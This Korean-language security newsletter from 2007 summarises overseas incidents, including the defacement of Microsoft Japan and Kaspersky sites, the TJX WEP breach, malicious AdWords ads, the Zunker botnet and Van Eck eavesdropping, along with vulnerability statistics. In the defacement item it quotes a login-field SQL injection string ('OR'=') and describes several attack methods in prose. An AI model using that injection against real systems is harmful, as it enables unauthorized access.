<32303037303531342DC1A4BAB8BAB8C8A3C4C1BCB3C6C3B4BABDBAB7B9C5CD28323030372D34C8A3292E687770>

2007-4호 SECON 정보보호 해외뉴스 해외 보안 이슈 2 제로-데이 현황 23 SECON 웹해킹 보안 이슈 WASC 웹 보안 위협 보고서(2007.1-4월) 26 미 CSI 문서 AJAX와 하이재킹-웹2.0은 성장하고 있지만 우리는 아 직 준비되지 않았다 43

SECON 정보보호 해외뉴스 해외 보안 이슈 MS 일본 웹사이트 변조 (출처: http://isc.sans.org/diary.html?storyid=2699) 미 SANS 연구소가2007년 4월 29일, 누군가가 일본 마이크로소프트 사이트를 변조했다고 밝혔다. 변조된 페이지는 ieak.microsoft.com의 서브페이지인 http://ieak.microsoft.com/1.0/newlicensee.asp 로, 이 페이지는 인터넷 익스플로러 관리 키트 배포판 라이센스 서비스를 제공하고 있다. 이 사이트는 microsoft.com의 서브 도메인이지만, 서버는 마이크로소프트 네트워크가 아닌, 파트너 호스팅 업체가 관리하고 있으며, 바이러스 등 은 설치되지 않았다고 한다. 그렇기 때문에, 이번 사건으로 해서 마이크로소프트의 브랜드 이 미지가 손상되지는 않겠지만, 웹사이트에 바이러스가 설치되는 경우, 기업 이미지가 현저하게 떨어진다는 점에 유의해야 한다고 SANS는 지적했다. - 2 -

최근 들어 웹사이트 관리를 외주를 주는 경우가 늘고 있다. 외주를 줄 때는 외주업체와 반드 시 보안을 올바로 확인하는 것이 중요하다고 SANS는 강조했다. 변조된 페이지는 공격자의 닉 네임을 올리고, 외부 이미지를 표시했다. 이 이미지는1998년 빌게이츠가 벨기에를 방문했을 때 누군가 파이를 얼굴에 던졌던 사건의 사진으로 보인다. 카스퍼스키랩 브라질 웹사이트 변조(출처: http://www.zone-h.org/content/view/14734/31/) MS 일본 사이트를 변조한 해커가 5월 4일 카스퍼스키랩 사이트도 변조했다. 카스퍼스키랩 은 네이버의 온라인 보안 서비스에 자사 엔진을 제공하고 있다. Zone-H는 IEAK 사이트 관계 자의 말을 인용, 다음과 같이 전하고 있다: 변조되었던 마이크로소프트 일본 사이트 공격자는cyb3rt(Cyber-Attacker)라는 닉의 사우 디 아라비아 출신의 남자라고 한다. cyb3rt는 새로 등장한 해커가 아니며, 이전에도 Zone-H 에 XSS 공격을 시도해 멤버의 관리자 패스워드를 빼내 Zone-H의 영문 사이트를 변조한 적이 있다". 공격자에 의하면, 이 웹사이트에는 로그인 필드에 SQL 인젝션 취약점(OR'=)이 존재했 으며, 이 취약점을 이용해 임의의 SQL 커멘드를 실행해 페이지를 변조한 후 html 컨텐츠를 삽 입했다고 한다. 많은 사람들이 이런 공격이 ASP 기반의 페이지와 로그인 양식에만 해당된다고 생각하는 것 같다. 실제로, 이런 유형의 공격은 ASP, HTML, PHP, CFM 이라면 어떤 페이지/ 소스 유형이라도 공격 가능하다. SQL 쿼리상에 하나의 실수만 있어도 사이버 범죄자들은 이 실수를 익스플로잇 할 수 있다. 이에 대한 유일한 해결책은 관리자와 코드 작성자와 공동 작업 으로 소스 코드를 점검해 향후 문제를 발생시킬 소지가 있는 실수를 패치하는 것이다. 그러나 방대한 양의 웹페이지 소스코드를 완벽하게 점검하는 것은 어려운 일이기 때문에 다 른 방법도 병용해야 한다: 예를 들어, mod_security 등의 Apache 모듈,.ht 접속을 URL 상의 SQL 스트링 실행으로 제한한다던가, PHP 설정시 magic_quote를 활성화 하는 등의 방법을 들 수 있다. - 3 -

윈도우즈 서버의 경우, 필터 기능을 직접 웹페이지에 사용해 사용자 입력을 체크하는 방법도 있다. 필터를 사용하는 경우, 경고 메세지를 disable 하는 것이 좋다. 경고 메시지는 공격자가 웹사이트의 데이터베이스나 테이블/컬럼을 공격하는데 필요한 정보가 될 수 있기 때문이다. 오늘도(2007.5.4) Cyb3rt은 많은 웹페이지 공격에 성공했다. 그 중에는 Kaspersky Labs의 웹 사이트도 포함되어 있다. 버그 헌터들 - 온라인 어플리케이션 딜레마에 직면 (출처 : http://news.zdnet.com/2100-1009_22-6175737.html) 화이트햇 해커들이 버그를 보고하기를 꺼려 온라인 어플리케이션의 보안 취약점이 픽스되지 않을 수도 있다. 웹 어플리케이션은 버그 헌터들에게 있어서 일종의 딜레마다. 어떻게 하면 감옥에 가지 않고 보안을 테스트할 수 있을까? 윈도우즈나 워드 등의 소프트웨어의 경우, 자신의 PC로 보안 취 약점 여부를 체크할 수 있지만, 웹 어플리케이션의 경우는 그렇지 못하다. 잘못 테스트 했다가 는 불법으로 고발을 당할 수도 있기 때문이다. "다른 시스템에 호스팅된 웹 어플리케이션을 테스트 하는 데는 위험이 따릅니다. 이것이 웹 어플리케이션 모델이 갖는 새로운 문제점입니다. 뉴욕 브로클린 로스쿨의 인터넷 법규 전문 웬디 셀처는 말한다. 소프트웨어 버그 발견으로 좋은 평판을 얻고 있는 화이트햇 해커들은, 법 적인 문제 때문에 웹 어플리케이션 테스트를 망설이고 있다. 그로 인해 온라인 어플리케이션은 기존의 소프트웨어들처럼 정밀 테스트를 받지 못해, 심각한 취약점이 남게 되어, 악의적인 범 죄자들이 발견하게 될 가능성을 열어주는 결과를 가져올 수 있다. "웹사이트 취약점을 알아내는 것이 불법이라면, 웹 사이트 취약점은 악의적인 해커들만이 발견할 수 있을 것이다. 이것이 웹 2.0 시대로 접어들면서, 정보 보안에 있어 가장 큰 이슈 중 하나다." 웹 보안회사 화이트햇 시큐리티의 Jeremiah Grossman은 말한다. 라이벌 웹 보안회사 SPI 다이너믹스의 칼렙 시마도 법적인 문제로 인해 웹 어플리케이션이 안전하지 못하게 될 것 이라는데 동의한다. "만일 취약점이 존재한다면, 그 취약점을 발견하는 사람들은 불법인지 여 부를 상관하지 않는 블랙햇 해커들일 것이다. 따라서 웹 어플리케이션은 안전하지 못하게 될 것이다." 웹 2.0으로 알려진 기술이 각광을 받으면서 웹사이트 기능은 늘어가고 있다. 하지만 사이트 가 새로운 기능을 제공할수록, 보안 위협은 데스크탑 어플리케이션에 비해서 늘어날 수 밖에 없다고 전문가들은 말한다. 데스크탑 소프트웨어의 경우 버그 찾기는 합법적으로 간주되어 왔다. 그러나 웹사이트는 그 렇지 못하다고 옥스포드 대학 인터넷 연구소의 조나단 지트래인 교수는 말한다. 미국의 컴퓨터 사기와 오용 법령 및 기타 국가들은 허가받지 않고 머신에 접속하는 행위와 허가받더라도 과도하게 접속하는 행위를 범죄로 규정하고 있다. "웹 어플리케이션의 보안 취약 점은 대부분 위의 두 가지 방법을 통해 발견할 수 있다" 지트래인은 말했다. 수사관들은 온라인 어플리케이션을 침입하는 보안 연구원들에게 각종 법규를 적용시킬 수 - 4 -

있는데, 주로 컴퓨터 사기 및 오용 관련 법령을 적용하고 있다. 이 법령은 보호된 컴퓨터에 의 도적으로 허가받지 않고 접속하는 사람과, 그 결과 피해를 입힌 사람에게 벌금이나 1년형을 부과하고 있다. "이것은 사용자의 프라이버시나 정보를 위험하게 하는 취약점을 찾아내려 노력하는 사람들에 게 있어서 문제가 될 수 있다" 셀처는 말했다. TJX 전산망 해킹 알려진 WEP 취약점 이용한 듯 (출처: http://online.wsj.com/article_email/article_print/sb117824446226991797-lmyqjaxmde3nza 4NDIwNDQ0Wj.html) 45만 7천명의 카드 이용자 정보가 누출된 사상 최대 규모의 TJX 해킹 사건 관련, 월스트릿 저널지는 2007.5.4일자 기사를 통해, 수사관들은 지난 2005년 누군가가 마샬의 무선 링크에 위치한 "망원경 모양"의 안테나를 이용해 해킹한 것으로 믿고 있다고 보도했다. 이 무선 링크 는 WEP를 사용해 암호화 되어 있었지만, 이 암호화는 이미 지난 2001년 취약점이 발표된 바 있다. 기사에 의하면, 해커는 TJX 중앙 데이터베이스에 침입한 크래커는 루마니아나 러시아 갱단 소속으로 보인다고 한다. 이 사건은 2002년에서 2006년 사이 18개월 동안 북미와 영국 의 티제이엑스 계열 의류 매장 내 컴퓨터에서 발생했고, 지난해 12월 말 TJX가 뒤늦게 이를 발견, 연방당국에 신고하면서 세상에 알려졌다. 기사에 의하면, 범인들은 상점을 향한 망원경 모양의 안테나를 겨냥, 랩탑을 이용해 핸드헬 드 가격 체크용 디바이스와 금전 등록기 및 상점 컴퓨터가 주고 받는 데이터 스트리밍을 디코 딩 한 것으로 보인다고 한다. 범인들은 여기서 얻은 정보로 마샬스의 TJX 중앙 데이터베이스 에 침입했고, 약 1년동안 457만개의 카드 번호를 다운로드한 것으로 보인다고 한다. 2000년도부터 무선 데이터 네트워크가 폭발적으로 인기를 얻으면서 WEP이라 불리는 인코 딩 시스템이 사용되었다. 지난 2001년 한 보안 전문가가 이 WEP 시스템에는 취약점이 존재 해 이 취약점을 이용해 각종 주요 상점으로부터 암호화된 시스템을 크랙할 수 있었다고 발표 한 바 있다. 기사에 의하면, 2003년도부터 무선 산업은 더 안전한 WPA(Wi-Fi Protected Access)로 교체할 것을 권했지만 TJX는 교체에 늦장을 부렸다고 한다. TJX는 무선 네트워크 를 사용하는 자사의 많은 컴퓨터에 방화벽과 데이터 암호를 설치하지 않았고, 구매했던 다른 보안 소프트웨어도 올바르게 인스톨하지 않았다고 한다. 수사관에 의하면, 핸드헬드 장비로 데 이터를 도청하는 것은 열린 창문을 통해 집으로 들어가는 것만큼이나 쉬웠다고 한다. 구글 애드워즈를 이용한 새로운 공격 (출처: http://www.explabs.com/about/mediacenter/pr_042507_01.asp http://www.youtube.com/watch?v=id0wdzqb8xy) - 5 -

구글 애드워즈가 자동으로 키로그를 설치하는 악성 사이트로 연결되었다. 보안 소프트웨어 벤더 Exploit Prevention Labs가 4월 25일 구글이 제공하는 광고 서비스 애드워즈를 이용한 새로운 공격이 발견되었다고 밝혔다. 이 공격을 이용하면 공격자가 게시한 구글 광고 링크를 클릭시 공격 사이트에 유도되어 사용자 시스템에 바이러스가 심어질 수 있 다고 한다. 4월 10일 최초로 발견된 이 공격은, 구글 검색창에 "how to start a business."로 검색, 상단에 나열된 스폰서 리스트 중 AllBusiness.com을 클릭하자, 패스워드를 빼내는 키로 거를 사용자 PC에 설치하는 사이트로 연결되었다고 한다. Exploit Prevention Labs에 의하면, 공격자는 "Better Business Bureau", "cars.com" 등의 실제로 존재하는 웹사이트 관련 광고를 만들었다고 한다. 광고상에는 Better Business Bureau 나 cars.com 의 실제 URL(www.bbb.org, cars.com)이 표시되지만, 공격자가 준비한 웹사이트 에 링크되어 있어 클릭하면 공격자의 웹사이트가 열린다. 구글 사이트에서, 검색 결과 리스트의 링크에 마우스 커서를 대면 링크의 URL이 웹 브라우 저의 상태바에 표시된다. 하지만 애드워즈 광고에 대해서는 상태바에 URL이 표시되지 않기 때문에, 사용자가 공격 사이트를 미리 알아내는 데는 어려움이 따른다고 한다. 공격 사이트에는 MDAC(Microsoft Data Access Components) 취약점을 이용한 익스플로잇 이 심어져, 패치가 적용되지 않은 시스템인 경우, 공격 사이트에 접속하는 것만으로 바이러스 가 인스톨된다고 한다. 조사 결과 4월 2일에서 3일 사이에 누군가가 Smarttracker.org를 등록하고, 4월 10일까지 구글 애드워즈 계정을 만들어 각종 검색어 캠페인을 구매한 것으로 드러났다. Exploit Prevention Labs에 의하면, 이 광고들은 삭제되었지만, 공격 사이트로 유도하는 모 든 광고가 삭제되었는지 여부는 알 수 없다고 한다. 미국 정부 컴퓨터 - 제로데이 공격 당해 (출처 : http://www.theregister.co.uk/2007/04/19/us_state_dept_rooted/) 작년 5월 미국 정부 컴퓨터를 노린 한 바이러스 공격자가 아시아의 한 직원이 감염된 이메 일을 열은 덕분에 정부 네트워크에 침입하는데 성공했다. 패치되지 않은 마이크로소프트 워드 취약점을 이용한 이 익스플로잇은 급격히 전파되었고, 몇 주 후 미 정부 수사관들은 감염된 몇 가지 증상을 발견, 공격이 생각보다 심각하다는 것을 깨닫고 데이터 유출을 막기 위해, 마이크 로소프트에 알림과 동시에, 동아시아와 정부 부서간의 모든 인터넷 접속을 차단했다. 이 차단 은 북한 미사일 테스트를 앞두고 긴장이 고조된 시기에 행해졌다. 미 정부는 7월 초 감염을 제어할 수 있었다. 마이크로소프트는 최초의 공격이 발생한지 8주 만인 8월 패치를 릴리스했 다. 컴퓨터가 감염된 시기에 보내진 이메일에는 아시아 외교 관련된 미 상원 연설 자료를 담은 마이크로소프트 워드 문서도 포함되어 있었다고 한다. 공격 세부 사항은 이번 주 미 상원 국토 안보정무위원회 청문회에서 다루어졌다. 미 외교 안전국 수석 보안 코디네이터 도날드 레이드 는, "이 공격으로 인해 제한된 양의 미국 정부 데이터가 알려지지 않은 해커에게 넘어갔다"고 말했다고 연합통신은 전했다. - 6 -

미국 정부 대변인은 공격자의 신원이나 목적에 대해 언급을 거부했지만, 보안 전문가들은 공 격의 복잡성으로 미루어 보건대, 외국 정부가 개입되었을 것으로 보고 있다. 미 SANS 연구소 의 리서치 디렉터 알란 팔러는, 이 공격이 일어난 것은 우연이 아니며, 미 의회가 다른 국가의 사이버 공격으로 침입 당했다는 사실을 인지하고 정신을 차리기 전에 언제든 발생할 수 있는 일이라고 말했다. 팔러는 때때로 미국 정부 사이버보안 방어는 부적절한 것으로 보인다고 말했 다. 보안 감사에 사용되는 비용이 낭비되고 있다며, 실제 보안에 사용되어야 할 것이라고 말했 다. 해커-시티뱅크 가상 키보드 해킹 시연 (출처: http://blogs.zdnet.com/security/?p=195) 인도의 한 보안 연구원이 시티뱅크의 새로운 가상키보드 안티-피싱 메커니즘이 쉽게 해킹당 할 수 있다고 경고했다. 현재 미국을 제외한 일부 국가에서 사용되고 있는 시티뱅크의 가상 키 보드는 온스크린 키보드를 이용한 패스워드 입력을 제공한다. 키보드 로거 등을 이용해 로그인 정보를 빼내는 것을 막기 위한 방법이지만, Yash K.S에 의하면, 스크린샷을 가로채 사용자 정 보를 빼내는 것이 가능하다고 한다. Yash는 proof-of-concept 데모를 통해, 로컬 공격자가 Win32API를 이용해 유저네임, 패스 워, 신용카드 번호, pin 넘버를 비롯, 가상 키보드를 통한 마우스 클릭을 캡처하는 것을 시연, 타겟 머신에 실행코드를 심고, 캡처한 스크린샷을 감춰진 디렉토리에 저장하고, call-home 봇 을 이용해 가상 키보드 입력 정보를 공격자가 제어하는 원격 서버에 전송하는 것을 보여줬다. PandaLabs - 봇넷 제어툴 Zunker (출처: http://blogs.pandasoftware.com/blogs/pandalabs/archive/2007/05/08/zunker.aspx http://www.pandasoftware.com/about/press/viewnews.aspx?noticia=8513) - 7 -

PandaLabs가 5월 10일 Zunker라는 이름의 봇넷 제어툴이 발견되었다고 발표했다. 사이버 범죄자들이 제작한 이 툴은 좀비 컴퓨터상의 봇넷을 제어하기 위한 어플리케이션으로, 현재 54개국의 수십에서 수천대 컴퓨터가 감염되었다고 한다. 컴퓨터를 감염시키기 위해 Zunker 제 작자는 사용자 PC에 설치된 소프트웨어 취약점을 익스플로잇 하는 방식을 선택, 사용자가 감 염된 웹페이지 방문시, 만일 그 사용자의 PC에 해커가 타겟으로 정한 프로그램 중 취약한 버 전이 설치되어 있으면, 실행 코드가 다운로드 되어 컴퓨터상에서 실행된다. 이 실행 코드는 봇 과 연결되어 사용자 PC는 사용자가 알지 못하는 사이 좀비 컴퓨터가 된다고 PandaLabs는 밝 혔다. 이메일보다 웹을 이용한 공격이 더 많아진다 - 트렌드 마이크로 (출처: http://news.com.com/2100-7349_3-6178930.html) 내년도까지 웹을 이용한 악성 공격이 이메일을 이용한 공격보다 더 많아질 것으로 트렌드 마이크로는 예측했다. 트렌드 마이크로에 의하면, 이메일은 전형적으로 공격의 제 1 수단으로 사용되어 왔지만, 사이버 범죄자들의 관심이 웹 공격으로 기울어짐에 따라 이같은 균형이 깨지 고 있으며, 2008년까지는 대부분 보안 위협이 웹 관련된 것들이 될 것이라고 한다. 이메일용 보안툴은 널리 사용되고 있지만, 웹 트래픽은 그렇지 못하다 80번 포트를 차단할 수는 없기 때문이다. 트렌드 마이크로는 사용자가 사이트를 볼 때 조용히 인스톨되는 drive-by 인스톨이 라 불리는 익스플로잇이 가능한 많은 버그들이 언더그라운드 마켓에서 조용히 거래되고 있다 고 밝혔다. 트렌드 마이크로는 금전적 이득을 노린 범죄자들을 웹 위협이 증가하는 이유로 들 었다. 이들은 윈도우즈 XP 취약점은 75,000 달러, 윈도우즈 비스타 취약점은 50,000 달러를 요구하고 있다고 한다. 베리사인의 idefense와 3Com의 티핑포인트의 경우, 약 12,000 달러를 지불하고 있다며, "좋은 사람들은 돈을 지불하지만, 나쁜 사람들은 더 많은 돈을 지불한다고 말했다. 키보드 입력속도를 이용한 새로운 인증 (출처: http://technology.timesonline.co.uk/tol/news/tech_and_web/personal_tech/article1667057.ece) 로그인시 키보드 입력 속도를 측정하는 테크놀로지가 생체-보안에 사용될 것 같다. 키보드 입력 속도가 은행 구좌 세부정보나 기타 온라인 서비스 인증에 사용될 것 같다. 미국 바이오패스워드는 아이디 도용의 위험을 줄이기 위해 패스워드 바이오-시큐리티를 개발 중이 다. 사용자는 유저네임과 패스워드를 일관된 속도로 입력해야 한다. 만일 평상시보다 사용자가 더 빨리 입력하거나 느리게 입력하면 종전의 방법대로 추가적인 보안 질문을 통해 로그인 할 수 있다. 이 테크놀로지는 대부분 컴퓨터 사용자들이 유저네임과 패스워드 같이 자주 입력하는 단어는 일관된 특별한 방식으로 입력한다는 점에 착안, 키 입력에 걸린 시간은 물론 특정 키 입력에 시간이 얼마나 걸리는지를 측정한다. - 8 -

등록 시 사용자는 유저네임과 패스워드를 9번 입력해 소프트웨어가 프로필을 생성한다. 이후 로그인은 이 프로파일에 근거한다. 이 방식을 사용하면 사용자의 키보드 입력을 99% 정확하 게 식별할 수 있다고 이 회사는 주장한다. 보안 전문가들은 이 같은 기술은 새로운 것이 아니며, 널리 설문에서 성공이 입증되기까지 적용은 제한적일 것으로 보고 있다. 캠브리지 대학의 컴퓨팅 사이언스 전문가 로스 앤더슨은 이 기술이 20년 동안 존재해 왔고, 시도되었지만 실패했다고 말했다, 그는 입력 패턴은 변한다 고 말했다. 키보드 입력 인식은 2차 대전부터 사용되어 왔다. 모르스 부호 운영자들은 키보드 입력 인식 을 보내는 사람의 아이디를 식별하기 위한 용도로 사용했지만, 공식적으로 개발된 것은 1980 년대다. 바이오패스워드는 현재 미국에 50개 이상의 고객사를 갖고 있다. 프로그램 사용료는 34,000 달러로, 사용자 한사람 당 매년 1.15달러의 등록비를 포함한다. 어도브 포토샵 취약점 익스플로잇 등장 (출처: http://news.zdnet.co.uk/security/0,1000000189,39286872,00.htm) 시큐니아가 4월 25일, 어도브 포토샵 최신 버전에 존재하는 보안 취약점을 이용한 익스플로 잇이 발견되었다고 밝혔다. 시큐니아 보안 권고문에 의하면, 이 취약점은 어도브 포토샵 CS3 와 CS2에 적용되며, 위험도는 치명적이라 한다. Marsu라는 한 보안 연구원이 발견한 이 취약 점은 bmp, dib, rle 등의 비트맵 파일 프로세싱 처리에 관련된 것으로, 이 취약점을 이용하면 버퍼 오버플로우 공격을 유발해 사용자 시스템을 장악할 수 있다고 한다. 시큐니아 CTO Thomas Kristensen은 이 취약점을 이용한 익스플로잇이 공개되었지만, 아직 익스플로잇을 이 용한 공격 사례는 발견되지 않았으며, 설사 공격이 있다고 해도 포토샵 개인 사용자가 많지 않 은 관계로 한정적일 것이라고 말했다. 시큐니아는 어도브사가 패치를 릴리스 할 때까지 출처가 불분명한 비트맵 파일은 열지 말 것을 권하고 있다. 어도브는 이 취약점에 관한 통보를 받았으 며, 현재 조사 중이라고 밝혔다. 어도브는 최근 차세대 디자인 및 웹 어플리케이션 Creative Suite 3 제품의 일부로 포토샵 CS3를 릴리스했다. 어도브는 포토샵 CS3를 조사하고 새로운 내용이 밝혀지는 대로 고객에게 최신 정보를 전할 것이라 말했다. 마이크로소프트 - 보안 포털 개설 (출처: http://www.microsoft.com/security/portal) 마이크로소프트가 자체적인 보안 포털을 올 7월 정식 런치할 예정이다. Microsoft Malware Protection Center 라는 이름의 이 사이트는 현재 preview 버전을 오픈한 상태. 마이크로소프 트 고객과 파트너, 보안 전문가들을 대상으로 현재 가장 활동적인 맬웨어 변종과 영향을 받는 - 9 -

제품을 다루고 있다. 마이크로소프트는 이 포털을 자사 보안제품 홍보 플랫폼으로도 사용할 예 정이다. 복사기 개인 정보 유출 위험에 노출 (출처:http://www.zone-h.org/content/view/14651/31/) 이메일, 분실된 랩탑에 이어, 이번에는 복사기가 범죄에 사용될 수 있다고 전문가들은 경고 한다. 범죄에 사용될 수 있는 복사기는 지난 5년 이내에 제조된 디지털 복사기로, 문서 재복 사를 위해 컴퓨터와 동일한 데이터 스토리지 메커니즘의 디스크 드라이브를 사용한다. 때문에, 복사기의 디스크 드라이브상의 데이터가 암호화 되어 있지 않거나, 덮어쓰기 등으로 보호되어 있지 않은 경우, 디지털 복사기로 복사한 문서의 정보를 빼내는 것이 가능하다고 한다. 미국의 경우, 세금 신고 기간이 오면, 수백만명의 미국 시민이 납세 신고 자료를 복사기를 이용해 복사하는데, 이 복사기로부터 간단하게 중요한 정보를 입수할 수 있다. 샤프사의 Ed McLaughlin 사장은, "고객이나 기업은 소셜 시큐리티 넘버나 직원 인식 번호, 취급 주의 정보 등의 민감한 신고 자료를 가정 이외의 장소에서 복사하는데, 이 같은 복사는 전자 절도를 당할 수 있기 때문에 위함하다"고 지적했다. 그는 또한, 복사기 제조사들이 보안 기기를 추가로 탑재한다 하더라도, 취약한 오래된 복사기가 아직도 많다고 지적했다. 복사기 제조사 Sharp의 조사에 의하면, 조사 대상인 미국인의 절반 이상이 복사기에 잠복하 는 데이터 시큐러티의 리스크에 대해 알지 못한다고 응답했으며, 응답자의 약 55%는 납세 신 고 및 관련 자료를 복사 혹은 프린트할 것이라고 응답했다고 한다. 이런 자료들의 복사는 대부분 사무실, 도서관, 커피숍 등, 데이터에 허가받지 않고 접속하는 것이 가능한 공공 장소에서 행해지고 있다. 보안에 주의를 기울이는 많은 기업들은 이미 복사 기를 보안 취약점 리스트에 포함시키고 있다. 폰뱅킹 취약점 (출처:http://www.zone-h.org/content/view/14661/31/ http://www.javelinstrategy.com/) 텔레뱅킹을 이용한 금융 거래도 위험하다고 미 Javelin Strategy & Research가 주장했다. Javelin이 최근 릴리스한 최신 연구 보고서에 의하면, 폰뱅킹은 다른 온라인 뱅킹에 비해 안전 하지 않다고 한다. 보고서는 현재 은행들은 온라인 인증은 신경 쓰는 반면, 폰뱅킹 인증 방법 은 뒷전이라고 지적했다. 폰뱅킹 사용자는 녹음된 음성 안내에 따르거나, IVR(Interactive Voice Response: 음성 자동 응답 장치)로 인증을 받는다. 음성 생체 인증이 획기적인 보안으로 생각할 수 있겠지만, 최근 연구 결과 이러한 혁신 기술이 아직 충분하지 않다는 것. 보고서에 의하면, 미국의 상위 23개 은행 및 금융기관 가운데, 고객을 인증하기 위해서 소셜 시큐리티 넘버를 묻는 곳은 25%, 패 스워드나 보안 질문을 묻는 곳은 불과 8%에 못 미친다고 한다. 2007년 3월 구좌 거래 내역이 - 10 -

나 지불 청구서를 확인하기 위해 은행의 자동전화 시스템을 사용한 온라인 고객은 전체의 약 35%라고 한다. 전화를 이용한 인증이나 금융거래에 보안상 문제점들을 고려할 때, 전화의 거 래 채널을 개입시킨 사기가 증가할 수 있다고 한다. 영국의 경우, 2005년 온라인 및 텔레뱅킹 을 위한 인증 기준이 발표되었다. 인증은 작은 디바이스로, 사용자가 PIN 카드를 삽입한 후 4 자리수의 PIN 코드를 입력하면, 알고리즘에 의해서 1회만 사용할 수 있는 임시 패스워드가 생 성되어 기기의 스크린에 표시된다. 중국 TV 방송국 하이재킹 당해 (출처: http://www.msnbc.msn.com/id/18467740/ http://www.taipeitimes.com/news/world/archives/2007/05/05/2003359559) 중국 서부 위성 TV가 해커들에 의해 하이재킹 당한 것으로 보인다. 상하이Xinmin 이브닝 뉴스를 인용, TV 스크린이 거의 2시간동안 화면에 아무 것도 나오지 않거나, 30-40초 동안 반정부 메세지가 보여졌다고 보도했다. 이 보고서는 메세지 내용에 대 해서는 언급하지 않았다. TV 방송국 관계자들은 해커들이 위성을 하이재킹한 것으로 보고 있 다고 보고서는 밝혔다. 그러나 관동의 케이블 TV 관계자들은 사고 관련된 문제점은 이미 픽스 가 되었다고 말했다. 이전에도 중국의 위성 신호를 가로챈 전적이 있는 팔룬 공 그룹은 그런 공격을 일으킬 만한 전문적 기술이 없다고 말했다. 광조우 위성 텔레비전 방송국 관계자들은 입을 굳게 다물고 있다. StopBadware.org - 맬웨어 호스팅 서비스 Top 5 릴리스 (출처: http://stopbadware.org/home/pr_050307) 악성코드 감시 비영리 사이트인 StopBadware.org가 5월 4일, 바이러스에 감염된 수많은 웹 사이트를 호스팅하는 호스팅 제공업체 5개사를 발표했다. StopBadware.org는 약 5만개의 사이트를 분석해 악성 코드를 배포하는 웹 사이트 대부분이 이 5개사의 웹 호스팅 서비스를 이용하는 것을 밝혀졌다고 말했다. 이 사이트들이 호스팅 하고 있는 감염된 사이트 수는 다음과 같다: 1. ipowerweb : 10,834 2. Layered Technologies: 2,513 3. ThePlanet.com Internet Services: 2,056 4. Internap Network Services: 1,437 5. CHINANET Guangdong province network: 786-11 -

랩탑 및 플랫 패널 원거리 도청 가능 - Van Eck 기법에 취약 (출처: http://www.newscientist.com/blog/technology/2007/04/seeing-through-walls.html) 건물 안 몇 방 건너편에 위치한 누군가가 나의 모니터를 볼 수 있다는 것을 생각해 본 적이 있는지? 불가능해 보일지 몰라도 가능하다. 뉴사이언티스트지는 4월 20일 캠브리지 대학 컴퓨 터 보안 연구원 마쿠스 쿤의 Van Eck 기법을 상세히 보도했다. 쿤은 라디오 안테나와 라디오 수신기(가격은 전부 합해 1000 파운드 미만)만 있으면 된다. 쿤은 두개의 인접한 사무실과 3개의 플라스터보드 벽을 통과해 이미지를 캡처할 수 있다는 것 을 보여주었다. 1985년 윌리엄 반 에익은 CRT 디스플레이에서 전자 코일에 의해 생성되는 라 디오 방출을 맞춰 이미지로 재구성 하는 것이 가능하다는 것을 증명했다. 이 실습은 반 에익 프레킹으로 알려졌으며, NATO는 시스템이 이 프레킹에 취약하지 않게 하기 위해 많은 돈을 들였다. CRT는 이제 사양길에 접어들었다. 그러나 쿤은 도청이 플랫 패널 디스플레이에도 가 능하다는 것을 보여주었다. 약간 다르게 작동한다. 플랫 패널 디스플레이는 케이블이 모니터에 신호를 보내기 위해 생성하는 라디오 방출로 튜닝하면 된다. 온스크린 이미지는 한번에 1픽셀 씩 케이블을 통해 흘러든다. 스택되기 위해 통과하기 때문이다. 쿤은 특정 웨이브폼에서 각각 의 픽셀 색상을 디코드하는 작업을 해왔다. 모든 준비를 올바로 한다면, 얼마간의 거리에서 시 그널을 잡을 수 있다. "나는 3개의 벽 건너편에 있는 랩탑을 도청할 수 있었다" 쿤은 말한다. CEBIT 컨퍼런스2006에서 나는 25미터 밖에서 하는 파워포인트 프레젠테이션을 볼 수 있었 다." - 12 -

쿤은 랩탑도 취약하다고 말했다. 랩탑에 부착된 금속 경첩이 디스플레이 케이블의 신호를 전하 기 때문이다. 신호를 잘 잡기 위한 방법이 많다고 한다. 예를 들어 작은 전선이나 케이블은 큰 차이를 보여준다고 한다. 이런 종류의 공격을 방어하려면 차단기능이 있는 케이블을 사용하고 특정 색상을 조합하고 모든 것을 모호하게 만들어야 한다고 쿤은 말했다. (IN)SECURE 매거진 이슈11 릴리스 (출처: http://www.insecuremag.com/) (IN)SECURE 매거진 이슈 11이 릴리스 되었다. (IN)SECURE 매거진은 PDF 포맷으로 제공 되는 무료 디지털 보안 매거진으로, 전자 패스포트, 가상 환경 봔, 양적인 시각으로 보는 침투 테스트, PKI, 웹 어플리케이션 개발자들을 위한 슈퍼 닌자 프라이버시 테크닉, 디지털 인증 네 트워크 보안 정책 강화하기 등을 다루고 있다. 미 CERT 2007년도 1/4분기 취약점 통계 발표 (출처: http://www.cert.org/stats/cert_stats.html) 미 CERT가 4월 30일 2007년도 1/4분기 취약점 통계를 발표했다. 이 통계는 각종 공공 소 스로부터의 취약점과 직접 접수한 신고들을 토대로 작성된다. 보고서에 의하면, 1995년부터 2007년 1/4분기까지 보고된 총 취약점수는 32,956개, 1998년부터 2007년 1/4분기까지 발표 된 총 취약점 노트수: 2,212개라고 한다. 1995-1999 - 13 -

연도 1995 1996 1997 1998 1999 취약점 수 171 345 311 262 417 2000-2007 연도 2000 2001 2002 2003 2004 2005 2006 1Q,2007 취약점 수 1,090 2,437 4,129 3,784 3,780 5,990 8,064 2,176 발표된 취약점 노트 1998-1999 연도 1998 1999 취약점 노 8 3 트 2000-2007 연도 2000 2001 2002 2003 2004 2005 2006 Q1,2007 취약점 노 47 326 375 255 341 285 422 150 트 2006년도 미국 인터넷 범죄 Top 10 보고서 (출처:http://www.ic3.gov/media/annualreport/2006_IC3Report.pdf) FBI와 전미 사무직 범죄 센터(National White Collar Crime Center)가 운영하는 미 인터넷 범죄 신고 센터가 지난 3월, 2006년도 인터넷 범죄 보고서를 릴리스했다. IC3로 불리는 인터 넷 범죄 신고 센터에 2006년도 접수된 신고는 207,492건으로 전년에 비해 10% 감소했지만, 손해액은 1억 9800만 달러로 기록을 갱신했다. 가장 많이 신고 된 범죄는 인터넷 경매 사기로 접수된 모든 신고의 45%를 차지했다. - 14 -

